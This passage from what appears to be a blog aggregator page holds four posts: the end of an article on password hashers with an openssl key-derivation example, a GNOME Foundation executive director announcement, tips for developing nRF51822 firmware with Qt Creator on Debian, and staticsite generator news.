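openssl enc -aes-256-cbc -pbkdf2 -iter 10000 -md sha256 \
    -pass pass:'master-password' -S 6578616d706c65 -P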

Conclusion

Forced to suggest a password hasher, I would probably point to LessPass or Master Password, depending on the platform of the person asking. But, for now, I have determined that the security drawbacks of password hashers are not acceptable and I do not recommend them. It makes my password management recommendation shorter anyway: "remember a few carefully generated passwords and shove everything else in a password manager".

[Many thanks to Daniel Kahn Gillmor for the thorough reviews provided for the password articles.]

Note: this article first appeared in the Linux Weekly News. Also, details of my research into password hashers are available in the password hashers history article.

Neil McGovern: A new journey – GNOME Foundation Executive Director

22 February, 2017 - 23:50

For those who haven’t heard, I’ve been appointed as the new Executive Director of the GNOME Foundation, and I started last week on the 15th February.

It’s been an interesting week so far, mainly meeting lots of people and trying to get up to speed with what looks like an enormous job! However, I’m thoroughly excited by the opportunity and am very grateful for everyone’s warm words of welcome so far.

One of the main things I’m here to do is to try and help. GNOME is strong because of its community. It’s because of all of you that GNOME can produce world leading technologies and a desktop that is intuitive, clean and functional. So, if you’re stuck with something, or if there’s a way that either myself or the Foundation can help, then please speak up!

Additionally, I intend on making this blog a much more frequently updated one – letting people know what I’m doing, and highlighting cool things that are happening around the project. In that vein, this week I’ve also started contacting all our fantastic Advisory Board members. I’m also looking at finding sponsors for GUADEC and GNOME.Asia, so if you know of anyone, let me know! I also booked my travel to the GTK+ hackfest and to LibrePlanet – if you’re going to either of those, make sure you come and introduce yourself :)

Finally, a small advertisement for Friends of GNOME. Your generosity really does help the Foundation support development of GNOME. Join up today!

Lisandro Damián Nicanor Pérez Meyer: Developing an nrf51822 based embedded device with Qt Creator and Debian

22 February, 2017 - 20:18
I'm currently developing an nRF51822-based embedded device. Being one of the Qt/Qt Creator maintainers in Debian, I would of course try to use it for the development. Turns out it works pretty well... with some caveats.

There are already two quite interesting blog posts about using Qt Creator on Mac and on Windows, so I will not repeat the basics, as they are there. Both use qbs, but I managed to use CMake.

Instead, I'll add some tips about the issues I needed to solve in order to make this happen on current Debian Sid.


  • The required toolchain is already in Debian, just install binutils-arm-none-eabi, gcc-arm-none-eabi and gdb-arm-none-eabi.
  • You will not find arm-none-eabi-gdb-py in the gdb-arm-none-eabi package. Fear not, the provided gdb binary is compiled with Python support, so it will work (a quick check is shown after this list).
  • To enable proper debugging be sure to follow this flag setup. If you are using CMake like in this example be sure to modify CMake/toolchain_gcc.cmake as necessary.
  • In Qt Creator you might find that, while trying to run or debug your app, you are greeted with a message box that says "Cannot debug: Local executable is not set." Just go to Projects → Run and change "Run configuration" until you get a valid path (i.e., a path to the .elf or .out file) in the "Executable" field.
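A quick sketch of the first two bullets (package names as given above):

sudo apt install binutils-arm-none-eabi gcc-arm-none-eabi gdb-arm-none-eabi
# there is no separate arm-none-eabi-gdb-py binary; check that the regular
# gdb was built with Python support, which Qt Creator's debugger relies on
arm-none-eabi-gdb --batch -ex 'python print("Python support: OK")'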

Cheers!

Enrico Zini: staticsite news: github mode and post series

22 February, 2017 - 20:10
GitHub mode

Tobias Gruetzmacher implemented GitHub mode for staticsite.

Although GitHub now has a similar site rendering mode, it doesn't give you a live preview: if you run ssite serve on a GitHub project you will get a live preview of README.md and the project documentation.

Post series

I have added support for post series, which allows you to easily interlink posts with previous/next links.

You can see it in action on links and on An Italian song a day, an ongoing series that currently posts a link to an Italian song each day.
